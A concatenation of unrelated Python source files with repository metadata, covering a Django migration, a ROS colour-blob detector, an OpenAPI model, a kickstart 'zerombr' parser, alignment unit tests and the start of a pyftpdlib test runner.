795551e17833f98b83fd1a6fc340bfc8a30f8a39 | 1,800 | py | Python | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 1 | 2022-01-27T11:58:10.000Z | 2022-01-27T11:58:10.000Z | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 5 | 2021-03-19T00:01:54.000Z | 2022-03-11T23:46:21.000Z | blousebrothers/confs/migrations/0056_auto_20171026_1356.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-10-26 13:56
from __future__ import unicode_literals
from decimal import Decimal
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('confs', '0055_auto_20171016_0854'),
]
operations = [
migrations.AddField(
model_name='conference',
name='correction_dispo',
field=models.BooleanField(default=True, help_text="Désactive l'accès à la correction si tu fais une correction en présentiel. N'oublie pas de le ré-activer après !", verbose_name='Correction accessible'),
),
migrations.AlterField(
model_name='conference',
name='for_sale',
field=models.BooleanField(default=True, help_text="Publier mon dossier avec les paramètres sélectionnés. Je certifie que le matériel de ma conférence est original et je dégage BlouseBrothers de toute responsabilité concernant son contenu. Je suis au courant de mes obligations en matière de fiscalité, détaillées dans les <a href='/cgu/'>conditions générales d'utilisation</a>.", verbose_name='Accessible à tous'),
),
migrations.AlterField(
model_name='conference',
name='for_share',
field=models.BooleanField(default=True, help_text="Le dossier est accessible aux personnes autorisées dans la section <a href='/amis'>Amis</a>, même si le dossier n'est pas accessible publiquement.", verbose_name='Accessible à mes élèves / amis'),
),
migrations.AlterField(
model_name='conference',
name='price',
field=models.DecimalField(decimal_places=2, default=Decimal('1'), help_text='', max_digits=6, verbose_name='Prix de vente'),
),
]
| 48.648649 | 426 | 0.68 |
7955540a462c2926c616da2b9b0d1493618ea5f2 | 3,550 | py | Python | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/ros_cap/src/line_detector.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | null | null | null | #!/usr/bin/env python
import math
import rospy
import cv2
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point
from std_srvs.srv import Empty, EmptyResponse
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
# define range of blue color in HSV
lower_blue = np.array([110,50,50])
upper_blue = np.array([130,255,255])
lower_red = np.array([0,0,0])
upper_red = np.array([0,0,0])
lower_yellow = np.array([20,150,130])
upper_yellow = np.array([35,255,255])
lower_white=np.array([180,0,200])
upper_white=np.array([180,90,255])
class BlobColor():
def __init__(self):
#Subscribirce al topico "/duckiebot/camera_node/image/raw" para recibir imagen
self.image_subscriber = rospy.Subscriber("/duckiebot/camera_node/image/raw",Image,self._process_image)
#Clase necesaria para transformar el tipo de imagen
self.bridge = CvBridge()
#Ultima imagen adquirida
self.cv_image = Image()
#Area minima
self.min_area = 30
#Publicar a los topicos "
self.pub = rospy.Publisher("/duckiebot/patofiltrado",Image,queue_size=1)
self.publito = rospy.Publisher("/duckiebot/punto",Point,queue_size=1)
print("explotando en 3, 2, 1...")
def _process_image(self,img):
#Se cambiar mensage tipo ros a imagen opencv
try:
self.cv_image = self.bridge.imgmsg_to_cv2(img, "bgr8")
except CvBridgeError as e:
print(e)
#Se deja en frame la imagen actual
frame = self.cv_image
#Cambiar tipo de color de BGR a HSV
color_space = cv2.COLOR_BGR2HSV
image_out = cv2.cvtColor(frame, color_space)
# Filtrar colores de la imagen en el rango utilizando
mask = cv2.inRange(image_out, lower_white, upper_white)
# Bitwise-AND mask and original image
#segment_image = cv2.bitwise_and(frame,frame, mask= mask)
#imga= self.bridge.cv2_to_imgmsg(segment_image, "bgr8")
#self.pub.publish(imga)
kernel = np.ones((5,5),np.uint8)
#Operacion morfologica erode
img_out = cv2.erode(mask, kernel, iterations = 1)
#Operacion morfologica dilate
img_out = cv2.dilate(img_out, kernel, iterations = 1)
image, contours, hierarchy = cv2.findContours(img_out,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
x1=0
x2=0
y1=0
y2=0
for cnt in contours:
#Obtener rectangulo
x,y,w,h = cv2.boundingRect(cnt)
#Filtrar por area minima
if w*h > self.min_area:
#Dibujar un rectangulo en la imagen
x1=x
y1=y
x2=x+w
y2=y+h
frame=cv2.rectangle(frame, (x1,y1), (x2,y2), (80,20,77), 2)
#Publicar Point center de mayor tamanio
puntillo=Point()
puntillo.x=((x1+x2)/2)
puntillo.y=((y1+y2)/2)
#Foco respecto a X fx truncado
puntillo.z=(310.089*3.5/w)
#foco respecto a Y fy truncado
#puntillo.z=(309.71*3.5/sqrt(y1^2+y2^2))
self.publito.publish(puntillo)
#Publicar frame
#imagesita=cv2.cvtColor(rectangle,cv2.COLOR_GRAY2BGR)
imgb= self.bridge.cv2_to_imgmsg(frame, "bgr8")
self.pub.publish(imgb)
def main():
rospy.init_node('BlobColor')
BlobColor()
rospy.spin()
if __name__ == '__main__':
main()
| 28.174603 | 111 | 0.605634 |
7955546d7eac7b111e7f6a56f844331fc31b3ee3 | 777 | py | Python | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | src/utils/images.py | bradley-erickson/dash-app-structure | 59ebd32626661c047a5baef38a5a0a9aa855243e | [
"MIT"
] | null | null | null | # notes
'''
This file is used for handling anything image related.
I suggest handling the local file encoding/decoding here as well as fetching any external images.
'''
# package imports
import base64
import os
# image CDNs
image_cdn = 'https://images.dog.ceo/breeds'
# logo information
cwd = os.getcwd()
logo_path = os.path.join(cwd, 'src', 'assets', 'logos', 'logo_main.png')
logo_tunel = base64.b64encode(open(logo_path, 'rb').read())
logo_encoded = 'data:image/png;base64,{}'.format(logo_tunel.decode())
def get_dog_image(breed, name):
'''
This method assumes that you are fetching specific images hosted on a CDN.
For instance, random dog pics given a breed.
'''
if breed and name:
return f'{image_cdn}/{breed}/{name}.jpg'
return None
| 26.793103 | 97 | 0.706564 |
79555601e6d891e58393af1464d338d5ed786b72 | 97 | py | Python | layers/functions/__init__.py | Rocketbase-AI/rockets-igor_ssd | c8979059b2f011b8f90d671cc544994a5835bb9c | [
"MIT"
] | 5,144 | 2017-03-16T15:05:34.000Z | 2022-03-30T11:41:10.000Z | layers/functions/__init__.py | snakers4/fish-ssd | 8ff1a3004a4ef0a93b665f6e58f25a1fc854af40 | [
"MIT"
] | 538 | 2017-03-29T02:39:26.000Z | 2022-03-24T07:30:33.000Z | layers/functions/__init__.py | snakers4/fish-ssd | 8ff1a3004a4ef0a93b665f6e58f25a1fc854af40 | [
"MIT"
] | 2,051 | 2017-03-17T00:42:48.000Z | 2022-03-29T01:58:38.000Z | from .detection import Detect
from .prior_box import PriorBox
__all__ = ['Detect', 'PriorBox']
| 16.166667 | 32 | 0.752577 |
7955560a4363b88aa9fa09451a8a4dcc1950f23f | 11,514 | py | Python | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/acapy_client/model/indy_non_revoc_proof.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | """
Aries Cloud Agent
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v0.7.2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from acapy_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel,
)
from acapy_client.exceptions import ApiAttributeError
class IndyNonRevocProof(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"c_list": ({str: (str,)},), # noqa: E501
"x_list": ({str: (str,)},), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
"c_list": "c_list", # noqa: E501
"x_list": "x_list", # noqa: E501
}
read_only_vars = {}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""IndyNonRevocProof - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
c_list ({str: (str,)}): [optional] # noqa: E501
x_list ({str: (str,)}): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""IndyNonRevocProof - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
c_list ({str: (str,)}): [optional] # noqa: E501
x_list ({str: (str,)}): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(
f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes."
)
| 41.869091 | 124 | 0.557061 |
79555778cf0aa45569038527c05d0c423b9a2d8a | 385 | py | Python | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | src/suss/wsgi.py | marzoukali/suss | 5073ace3621284ae135e2f7f0c228bce327b3b08 | [
"MIT"
] | null | null | null | """
WSGI config for suss project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'suss.settings')
application = get_wsgi_application()
| 22.647059 | 78 | 0.781818 |
79555a9b278df67ae29f49dce8f719a7af2c6b8f | 2,642 | py | Python | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | hio-yocto-bsp/sources/poky/scripts/lib/mic/3rdparty/pykickstart/commands/zerombr.py | qiangzai00001/hio-prj | 060ff97fe21093b1369db78109d5b730b2b181c8 | [
"MIT"
] | null | null | null | #
# Chris Lumens <clumens@redhat.com>
#
# Copyright 2005, 2006, 2007 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
import warnings
from pykickstart.base import *
from pykickstart.options import *
import gettext
_ = lambda x: gettext.ldgettext("pykickstart", x)
class FC3_ZeroMbr(KickstartCommand):
removedKeywords = KickstartCommand.removedKeywords
removedAttrs = KickstartCommand.removedAttrs
def __init__(self, writePriority=110, *args, **kwargs):
KickstartCommand.__init__(self, writePriority, *args, **kwargs)
self.op = self._getParser()
self.zerombr = kwargs.get("zerombr", False)
def __str__(self):
retval = KickstartCommand.__str__(self)
if self.zerombr:
retval += "# Clear the Master Boot Record\nzerombr\n"
return retval
def _getParser(self):
op = KSOptionParser()
return op
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) > 0:
warnings.warn(_("Ignoring deprecated option on line %s: The zerombr command no longer takes any options. In future releases, this will result in a fatal error from kickstart. Please modify your kickstart file to remove any options.") % self.lineno, DeprecationWarning)
self.zerombr = True
return self
class F9_ZeroMbr(FC3_ZeroMbr):
removedKeywords = FC3_ZeroMbr.removedKeywords
removedAttrs = FC3_ZeroMbr.removedAttrs
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) > 0:
raise KickstartParseError, formatErrorMsg(self.lineno, msg=_("Kickstart command %s does not take any arguments") % "zerombr")
self.zerombr = True
return self
| 37.742857 | 283 | 0.715367 |
79555b5bbae0f22bd1f327ae2a1898e232a55dfc | 14,599 | py | Python | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 22 | 2016-08-30T16:56:33.000Z | 2021-11-20T15:32:35.000Z | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 11 | 2017-02-14T20:46:31.000Z | 2020-04-21T14:32:20.000Z | test/consam_test/alignments_test.py | umich-brcf-bioinf/Connor | b20e9f36e9730c29eaa27ea5fa8b0151e58d2f13 | [
"Apache-2.0"
] | 6 | 2016-12-07T09:13:26.000Z | 2021-11-20T15:34:52.000Z | #pylint: disable=invalid-name, too-few-public-methods, too-many-public-methods
#pylint: disable=protected-access, missing-docstring, too-many-locals
#pylint: disable=too-many-arguments,deprecated-method
from __future__ import print_function, absolute_import, division
from test.utils_test import MicroMock
from test.utils_test import BaseConnorTestCase
from connor.consam.alignments import ConnorAlign
from connor.consam.alignments import PairedAlignment
class ConnorAlignTest(BaseConnorTestCase):
def test_eq(self):
pysam_align = self.mock_align(query_name="align1")
base = ConnorAlign(pysam_align)
self.assertEqual(base, base)
self.assertEqual(base, ConnorAlign(pysam_align))
self.assertEqual(base, ConnorAlign(self.mock_align(query_name = "align1")))
different_pysam_align = ConnorAlign(self.mock_align(query_name = "align2"))
self.assertNotEqual(base, different_pysam_align)
different_filter = ConnorAlign(pysam_align)
different_filter.filter_value = "foo; bar"
self.assertNotEqual(base, different_filter)
def test_hash(self):
pysam_align_A_42 = self.mock_align(query_name="A", reference_start=42)
pysam_align_B_42 = self.mock_align(query_name="B", reference_start=42)
pysam_align_A_43 = self.mock_align(query_name="A", reference_start=43)
base = ConnorAlign(pysam_align_A_42, filter_value="f1")
same = ConnorAlign(pysam_align_A_42, filter_value="f1")
different_query_name = ConnorAlign(pysam_align_B_42, filter_value="f1")
different_start = ConnorAlign(pysam_align_A_43, filter_value="f1")
different_filter = ConnorAlign(pysam_align_A_42, filter_value="f2")
self.assertEqual(base.__hash__(), same.__hash__())
self.assertNotEqual(base.__hash__(), different_query_name.__hash__())
self.assertNotEqual(base.__hash__(), different_start.__hash__())
self.assertNotEqual(base.__hash__(), different_filter.__hash__())
def test_gettersPassthroughToPysamAlignSegment(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
pysam_align.set_tag('X1', 'foo')
connor_align = ConnorAlign(pysam_align)
self.assertEqual('queryname_1', connor_align.query_name)
self.assertEqual(99, connor_align.flag)
self.assertEqual(3, connor_align.reference_id)
self.assertEqual(142, connor_align.reference_start)
self.assertEqual(20, connor_align.mapping_quality)
self.assertEqual('8M', connor_align.cigarstring)
self.assertEqual(242, connor_align.next_reference_start)
self.assertEqual(100, connor_align.template_length)
self.assertEqual('ACGTACGT',
ConnorAlignTest.byte_array_to_string(connor_align.query_sequence))
self.assertEqual([20] * 8, connor_align.query_qualities)
self.assertEqual(150, connor_align.reference_end)
self.assertEqual('foo', connor_align.get_tag('X1'))
self.assertEqual([('X1', 'foo')], connor_align.get_tags())
def test_settersPassthroughToPysamAlignSegment(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
connor_align = ConnorAlign(pysam_align)
connor_align.query_name = 'queryname_11'
connor_align.flag = 147
connor_align.reference_id = 13
connor_align.reference_start = 1142
connor_align.mapping_quality = 120
connor_align.cigarstring = "2S8M"
connor_align.next_reference_id = 14
connor_align.next_reference_start = 1242
connor_align.template_length = 1100
connor_align.query_sequence = "TTACGTACGT"
connor_align.query_qualities = [20]*10
connor_align.set_tag('X1', 'foo', 'Z')
self.assertEqual('queryname_11', pysam_align.query_name)
self.assertEqual(147, pysam_align.flag)
self.assertEqual(13, pysam_align.reference_id)
self.assertEqual(1142, pysam_align.reference_start)
self.assertEqual(120, pysam_align.mapping_quality)
self.assertEqual('2S8M', pysam_align.cigarstring)
self.assertEqual(1242, pysam_align.next_reference_start)
self.assertEqual(1100, pysam_align.template_length)
self.assertEqual('TTACGTACGT',
ConnorAlignTest.byte_array_to_string(pysam_align.query_sequence))
self.assertEqual([20] * 10, pysam_align.query_qualities)
self.assertEqual(1150, pysam_align.reference_end)
self.assertEqual(('foo', 'Z'),
pysam_align.get_tag('X1', with_value_type=True))
def test_filter(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
connor_align = ConnorAlign(pysam_align)
self.assertEqual(None, connor_align.filter_value)
connor_align.filter_value = 'foo'
self.assertEqual('foo', connor_align.filter_value)
def test_orientation_left(self):
pysam_align = self.mock_align(reference_start=100, next_reference_start=200)
self.assertEqual('left', ConnorAlign(pysam_align).orientation)
def test_orientation_right(self):
pysam_align = self.mock_align(reference_start=200, next_reference_start=100)
self.assertEqual('right', ConnorAlign(pysam_align).orientation)
def test_orientation_sameIsNeither(self):
pysam_align = self.mock_align(flag=129,
reference_start=100,
next_reference_start=100)
self.assertEqual('neither', ConnorAlign(pysam_align).orientation)
class PairedAlignmentTest(BaseConnorTestCase):
def test_init(self):
left_align = self.mock_align(query_name="alignA",
query_sequence="AAATTT" "GGGG")
right_align = self.mock_align(query_name="alignA",
query_sequence="TTTT" "CCCGGG")
tag_length = 6
actual_paired_alignment = PairedAlignment(left_align,
right_align,
tag_length)
self.assertIs(left_align, actual_paired_alignment.left)
self.assertIs(right_align, actual_paired_alignment.right)
left_umt = self.byte_array_to_string(actual_paired_alignment.umt[0])
right_umt = self.byte_array_to_string(actual_paired_alignment.umt[1])
self.assertEquals(("AAATTT", "CCCGGG"), (left_umt, right_umt))
def test_init_valueErrorOnInconsistentQueryNames(self):
left = self.mock_align(query_name="alignA")
right = self.mock_align(query_name="alignB")
self.assertRaisesRegexp(ValueError,
(r'Inconsistent query names '
r'\(alignA != alignB\)'),
PairedAlignment,
left,
right,
tag_length=1)
def test_cigars(self):
left = MicroMock(query_name='A',
cigarstring='1S2M4S',
query_sequence='AAAAAA')
right = MicroMock(query_name='A',
cigarstring='16S32M64S',
query_sequence='AAAAAA')
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual(('1S2M4S', '16S32M64S'), paired_alignment.cigars())
self.assertEqual('1S2M4S~16S32M64S',
paired_alignment.cigars('{left}~{right}'))
def test_positions(self):
left = MicroMock(query_name='A',
reference_start=100,
reference_end=150,
query_sequence='AAAAAA')
right = MicroMock(query_name='A',
reference_start=200,
reference_end=250,
query_sequence='AAAAAA')
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual((101,251), paired_alignment.positions())
self.assertEqual('101~251',
paired_alignment.positions('{left}~{right}'))
def test_filter_value(self):
left = ConnorAlign(self.mock_align(), filter_value=None)
right = ConnorAlign(self.mock_align(), filter_value=None)
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual(None, paired_alignment.filter_value)
left = ConnorAlign(self.mock_align(), filter_value='')
right = ConnorAlign(self.mock_align(), filter_value='')
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual(None, paired_alignment.filter_value)
left = ConnorAlign(self.mock_align(), filter_value='foo')
right = ConnorAlign(self.mock_align(), filter_value=None)
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual(('foo', None), paired_alignment.filter_value)
left = ConnorAlign(self.mock_align(), filter_value=None)
right = ConnorAlign(self.mock_align(), filter_value='bar')
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual((None, 'bar'), paired_alignment.filter_value)
def test_query_name(self):
left = self.mock_align(query_name="alignA", reference_start=100)
right = self.mock_align(query_name="alignA", reference_start=200)
paired_alignment = PairedAlignment(left, right, tag_length=1)
self.assertEqual("alignA", paired_alignment.query_name)
def test_eq(self):
umt_length = 6
left = self.mock_align(reference_start=100, next_reference_start=200)
right = self.mock_align(reference_start=200, next_reference_start=100)
other = self.mock_align(reference_start=0, next_reference_start=500)
base = PairedAlignment(left, right, umt_length)
self.assertEquals(base, PairedAlignment(left, right, umt_length))
self.assertNotEquals(base, PairedAlignment(other, right, umt_length))
self.assertNotEquals(base, PairedAlignment(left, other, umt_length))
self.assertNotEquals(base, PairedAlignment(left, right, 1))
def test_hash(self):
umt_length = 6
left_A = self.mock_align(query_name="alignA", reference_start=100)
right_A = self.mock_align(query_name="alignA", reference_start=200)
left_B = self.mock_align(query_name="alignA", reference_start=100)
right_B = self.mock_align(query_name="alignA", reference_start=200)
actual_set = set()
base = PairedAlignment(left_A, right_A, umt_length)
actual_set.add(base)
self.assertEquals(1, len(actual_set))
actual_set.add(base)
self.assertEquals(1, len(actual_set))
actual_set.add(PairedAlignment(left_A, right_A, umt_length))
self.assertEquals(1, len(actual_set))
equivalent_pair = PairedAlignment(left_B, right_B, umt_length)
actual_set.add(equivalent_pair)
self.assertEquals(1, len(actual_set))
def test_replace_umt(self):
left_A = self.mock_align(query_sequence='AANN', query_qualities=[1,2,3,4])
right_A = self.mock_align(query_sequence='NNCC', query_qualities=[5,6,7,8])
paired_align = PairedAlignment(left_A, right_A, tag_length=2)
paired_align.replace_umt(('GG','TT'))
left = paired_align.left
right = paired_align.right
self.assertEquals('GGNN',
self.byte_array_to_string(left.query_sequence))
self.assertEquals('NNTT',
self.byte_array_to_string(right.query_sequence))
self.assertEquals([1,2,3,4],
left.query_qualities)
self.assertEquals([5,6,7,8],
right.query_qualities)
def test_replace_umt_errorIfInconsistentUmtLength(self):
left_A = self.mock_align(query_sequence='AANN', query_qualities=[1,2,3,4])
right_A = self.mock_align(query_sequence='NNCC', query_qualities=[5,6,7,8])
paired_align = PairedAlignment(left_A, right_A, tag_length=2)
self.assertRaisesRegexp(ValueError,
r'Each UMT must match tag_length \(2\)',
paired_align.replace_umt,
('G','TT'))
self.assertRaisesRegexp(ValueError,
r'Each UMT must match tag_length \(2\)',
paired_align.replace_umt,
('GG','T'))
self.assertRaisesRegexp(ValueError,
r'Each UMT must match tag_length \(2\)',
paired_align.replace_umt,
(None, None))
self.assertRaisesRegexp(ValueError,
r'Each UMT must match tag_length \(2\)',
paired_align.replace_umt,
('G',))
| 47.70915 | 91 | 0.612645 |
79555c2b59b237d99e9afc06647ae9779f592529 | 4,466 | py | Python | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 69 | 2015-12-28T07:02:51.000Z | 2022-03-31T13:36:42.000Z | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 23 | 2016-03-04T10:43:24.000Z | 2021-03-17T09:58:19.000Z | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 24 | 2016-02-29T11:45:47.000Z | 2021-12-24T08:41:37.000Z | #!/usr/bin/env python
# Copyright (C) 2007 Giampaolo Rodola' <g.rodola@gmail.com>.
# Use of this source code is governed by MIT license that can be
# found in the LICENSE file.
from __future__ import print_function
import atexit
import os
import sys
from unittest import TestResult
from unittest import TextTestResult
